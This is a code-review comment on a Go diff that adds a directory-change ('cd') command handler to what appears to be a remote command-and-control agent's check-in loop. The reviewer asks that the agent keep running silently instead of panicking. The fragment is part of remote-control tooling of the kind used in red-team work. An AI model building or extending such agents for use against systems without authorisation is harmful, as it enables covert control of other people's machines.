pkg/agent/agent.go

```diff
@@ -897,10 +897,85 @@ func (a *Agent) statusCheckIn(host string, client *http.Client) {
 							resp2.StatusCode))
 					}
 				}
-			}
-		default:
-			if a.Verbose {
-				message("warn", fmt.Sprintf("Received unrecognized message type: %s", j.Type))
+			case "cd":
+				var se string
+				var stdout string
+				err := os.Chdir(p.Args)
+				if err != nil {
+					se = err.Error()
+				} else {
+					stdout = fmt.Sprintf("Moved to %s", p.Args)
+				}
+
+				c := messages.CmdResults{
+					Job:    p.Job,
+					Stdout: stdout,
+					Stderr: se,
+				}
+
+				k, err := json.Marshal(c)
+				if err != nil {
+					panic(err)
```

Comment:
I must have missed this on the last NativeCMD PR. For the sake of availability, I would like the agent to silently continue as opposed to exiting. I'm open to feedback though.